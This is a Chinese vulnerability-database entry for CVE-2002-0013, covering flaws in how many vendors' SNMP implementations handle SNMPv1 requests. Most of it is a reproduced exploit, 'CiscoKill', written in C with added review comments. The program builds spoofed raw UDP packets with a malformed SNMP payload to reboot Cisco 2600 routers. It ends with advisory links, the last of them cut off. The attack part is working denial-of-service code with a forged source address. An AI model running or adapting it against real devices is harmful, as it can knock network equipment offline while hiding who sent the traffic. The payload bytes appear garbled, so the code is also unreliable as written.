多家厂商SNMP实现中SNMPv1请求处理存在多个安全漏洞

多家厂商SNMP实现中SNMPv1请求处理存在多个安全漏洞

漏洞ID 1106612 漏洞类型 权限许可和访问控制
发布时间 2002-02-12 更新时间 2005-10-20
CVE编号 CVE-2002-0013
CNNVD-ID CNNVD-200202-004
漏洞平台 Hardware CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/21296
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200202-004
|漏洞详情
SNMP请求是管理系统发送给代理系统的消息,通常用于询问代理系统当前的性能和配置信息、请求Management Information Base (MIB)中的下一个SNMP对象,或者修改代理的配置。许多SNMP实现被发现存在多个漏洞,这些漏洞出现在SNMP消息的解码和解释过程中。PROTOS小组开发的c06-SNMPv1测试工具已经发现众多厂商的SNMP实现在处理SNMP请求时存在大量安全问题,攻击者可能通过GetRequest、GetNextRequest、SetRequest命令使远程SNMP服务器崩溃,甚至以SNMP服务器的运行权限执行任意代码。各受影响产品的影响程度各不相同。
|漏洞EXP
source: http://www.securityfocus.com/bid/4132/info

Cisco products contain multiple vulnerabilities in the handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089); however, more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities.

It is reportedly possible for a remote attacker to create a denial of service condition by transmitting a malformed SNMP request to a vulnerable Cisco Operating System or Appliance. The affected device may reset, or require a manual reset to regain functionality. 

/* This program sends a spoofed SNMPv1 get request that causes a system reboot
   on Cisco 2600 routers with IOS version 12.0(10) 

   Author : [email protected]   ... don't be lame use for testing only! ..:) */

#include 		<stdio.h>
#include 		<string.h>
#include 		<unistd.h>
#include 		<stdlib.h>
#include 		<sys/socket.h>
#include 		<netinet/in.h>
#include		<netinet/ip.h>
#include		<netinet/udp.h>
#include		<arpa/inet.h>

	

/* Addresses taken from the command line: -s is copied verbatim into the IP
   source field (i.e. spoofed), -t is the destination. */
struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct sockaddr_in dest;      /* sendto() destination; only sin_family and sin_addr are filled in main() */

struct ip          *IP;       /* view of the IP header at the start of packet */
struct udphdr      *UDP;      /* view of the UDP header at packet+20 */
int p_number=1,sok,datasize,i=0;   /* packets to send (-n, default 1), raw socket, payload size, send counter */

char *packet,*source,*target;  /* outgoing datagram; -s / -t argument strings (static storage, so NULL if not given) */
char *packetck;                /* scratch buffer: pseudo-header + UDP header + payload, only used to compute the UDP checksum */
char *data,c;                  /* payload pointer inside packet; getopt()'s int result stored in a char */

/* UDP payload copied into the datagram in main(). datasize is taken as
   sizeof(snmpkill), which includes the terminating NUL of the literal. */
char snmpkill[] =  
  "x30x81xafx02x01x00x04x06x70x75x62x6cx69x63xa0x81"  
  "xa1x02x02x09x28x02x01x00x02x01x00x30x81x94x30x81"  
  "x91x06x81x8cx4dx73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x25x73x25x73x25x73x25x73x25x73"  
  "x25x73x25x73x25x73x81xffxffxffxffxffxffxffxffx7f"  
  "x05";


/* UDP pseudo-header. main() places it in front of a copy of the UDP header
   and payload (packetck) so that in_cksum() covers it when UDP->check is
   computed. Assumes u_long is 32 bits, the same assumption in_cksum()
   documents for long. */
struct pseudoudp {
u_long ipsource;   /* source address as placed in IP->ip_src, network order */
u_long ipdest;     /* destination address, network order */
char zero;         /* always 0 */
char proto;        /* 17 = UDP */
u_short length;    /* UDP length (header + payload), network order */
} *psudp;


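/*
 * Internet (RFC 1071) ones-complement checksum over nbytes bytes at ptr,
 * read as 16-bit words in host memory order.
 *
 * ptr    - buffer to sum; must hold at least nbytes bytes
 * nbytes - length in bytes; an odd trailing byte is padded with a zero byte
 * Returns the 16-bit checksum in the same memory order as the input, so it
 * can be stored straight into a header field.
 *
 * The original had no return type (implicit int, invalid since C99) and
 * accumulated into a signed long. An unsigned accumulator makes the carry
 * folding well-defined whatever the width of long, and folding until the
 * high half is empty is correct for any input size.
 */
unsigned short
in_cksum (unsigned short *ptr, int nbytes)
{
  unsigned long sum = 0;	/* at least 32 bits; unsigned, so no overflow UB */

  /* add sequential 16-bit words */
  while (nbytes > 1)
    {
      sum += *ptr++;
      nbytes -= 2;
    }

  /* odd trailing byte: a word whose second byte is zero */
  if (nbytes == 1)
    {
      unsigned short oddbyte = 0;
      *(unsigned char *) &oddbyte = *(unsigned char *) ptr;
      sum += oddbyte;
    }

  /* fold carries out of the top bits back into the low 16 bits */
  while (sum >> 16)
    {
      sum = (sum >> 16) + (sum & 0xffff);
    }

  /* ones-complement, truncated to 16 bits */
  return (unsigned short) ~sum;
}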


/* Print the banner and the accepted command-line options to stdout. */
void usage (void)
{
  static const char *const lines[] = {
    "Kundera CiscoKill v1.0n",
    "Usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target n",
  };
  for (size_t k = 0; k < sizeof lines / sizeof lines[0]; k++)
    {
      fputs(lines[k], stdout);
    }
}



/*
 * Entry point. Parses -s (source address), -n (packet count) and -t (target),
 * builds one raw IP/UDP datagram carrying snmpkill addressed to UDP port 161,
 * and sends it p_number times through a raw socket.
 *
 * Raw IPPROTO_RAW sockets are privileged on typical systems, and the IP
 * source is whatever -s supplied, so the datagram's origin is not
 * trustworthy. From a monitoring point of view the datagram has constant
 * fields: IP id 666, TTL 245, UDP source port 666, destination port 161 and
 * a payload of sizeof(snmpkill) bytes.
 *
 * Returns 0 on success (falls off the end of main, C99 semantics); exits
 * with 1 on bad usage and EXIT_FAILURE on socket or send errors.
 */
int main(int argc,char **argv){

if (argc < 2){
usage();
exit(1);
}

/* getopt() returns -1 when the options are exhausted; comparing with EOF
   relies on EOF == -1, and c is a char, not an int. */
while((c=getopt(argc,argv,"s:t:n:"))!=EOF){
	switch(c) {
	 case 's': source=optarg; break;
	 case 'n': p_number=atoi(optarg); break;   /* no validation of the count */
	 case 't': target=optarg;
	 }
}

/* Raw socket: the IP header below is supplied by this program. */
if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
	printf("Can't create socket.n");
        exit(EXIT_FAILURE);
}

/* NOTE(review): there is no check that -t (or -s) was given; both are
   still NULL here if absent. */
destip_addr.s_addr=inet_addr(target);
sourceip_addr.s_addr=inet_addr(source);

datasize=sizeof(snmpkill);

/* IP header (20) + UDP header (8) + payload. */
packet = ( char * )malloc( 20 + 8 + datasize );

IP     = (struct ip     *)packet; 

/* NOTE(review): sizeof(packet) is the size of the pointer, not of the
   buffer, so only the first few bytes are cleared; header fields not
   assigned below keep whatever malloc() returned. */
memset(packet,0,sizeof(packet)); 
        
        /* IPv4 header with constant id/TTL; protocol 17 = UDP. */
        IP->ip_dst.s_addr  = destip_addr.s_addr;
        IP->ip_src.s_addr  = sourceip_addr.s_addr;
        IP->ip_v = 4;
        IP->ip_hl = 5;
        IP->ip_ttl = 245;
        IP->ip_id = htons(666);
        IP->ip_p = 17;
        IP->ip_len  = htons(20 + 8 + datasize);
        /* Header checksum over the 20-byte IP header only. */
        IP->ip_sum    = in_cksum((u_short *)packet,20);

 
UDP   = (struct udphdr    *)(packet+20);
      UDP->source = htons(666); 
      UDP->dest   = htons(161);
      UDP->len     = htons(8+datasize);
      UDP->check = 0;   /* must be zero while the checksum is computed */
      /* UDP checksum covers pseudo-header + UDP header + payload, so assemble
         that sequence in a scratch buffer and sum it. */
      packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
      bzero(packetck,8 + datasize + sizeof(struct pseudoudp));     
      psudp = (struct pseudoudp *) (packetck);
      psudp->ipdest = destip_addr.s_addr;
      psudp->ipsource = sourceip_addr.s_addr;
      psudp->zero = 0;
      psudp->proto = 17;
      psudp->length = htons(8+datasize);
      /* The payload area after UDP in packet is not filled yet at this point;
         the next memcpy overwrites that part of packetck with snmpkill. */
      memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);

      UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));    

/* Copy the payload into the datagram itself (data is declared char *; the
   cast to unsigned char * is a mismatched pointer assignment). */
data   = (unsigned char    *)(packet+20+8); 
memcpy(data,snmpkill,datasize);  
                                                                                                     
/* Only the destination address is needed here; the UDP ports travel in
   the header built above. */
dest.sin_family=AF_INET;
dest.sin_addr.s_addr=destip_addr.s_addr;                                                                        

/* Send p_number identical copies; the first send error aborts the run. */
while (i<p_number)
{
if (( sendto(sok,packet,20+8+datasize,0,( struct sockaddr * ) &dest,sizeof(dest)))<0)
{
printf("Error sending packet.n");
exit(EXIT_FAILURE);
}

i++;

}
printf("%d packets sent.n",i);

}
|参考资料

来源:US-CERT Vulnerability Note: VU#854306
名称:VU#854306
链接:http://www.kb.cert.org/vuls/id/854306
来源:CERT/CC Advisory: CA-2002-03
名称:CA-2002-03
链接:http://www.cert.org/advisories/CA-2002-03.html
来源:MS
名称:MS02-006
链接:http://www.microsoft.com/technet/security/bulletin/MS02-006.asp
来源:SUNALERT
名称:57404
链接:http://sunsolve.sun.com/search/document.do?assetkey=1-26-57404-1
来源:SGI
名称:20020201-01-A
链接:ftp://patches.sgi.com/support/free/security/advisories/20020201-01-A
来源:REDHAT
名称:RHSA-2001:163
链接:http://www.redhat.com/support/errata/RHSA-2001-163.html
来源:ISS
名称:20020212 PROTOS Remote SNMP Attack Tool
链接:http://www.iss.net/security_center/alerts/advise110.php
来源:www.ee.oulu.fi
链接:http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html
来源:US Government Resource: oval:org.mitre.oval:def:87
名称:oval:org.mitre.oval:def:87
链接:http://oval.mitre.org/repository/data/getDef?id=oval:org.mitre.oval:def:87
来源:US Government Resource: oval:org.mitre.oval:def:298
名称:oval:org.mitre.oval:def:298
链接:http://oval.m
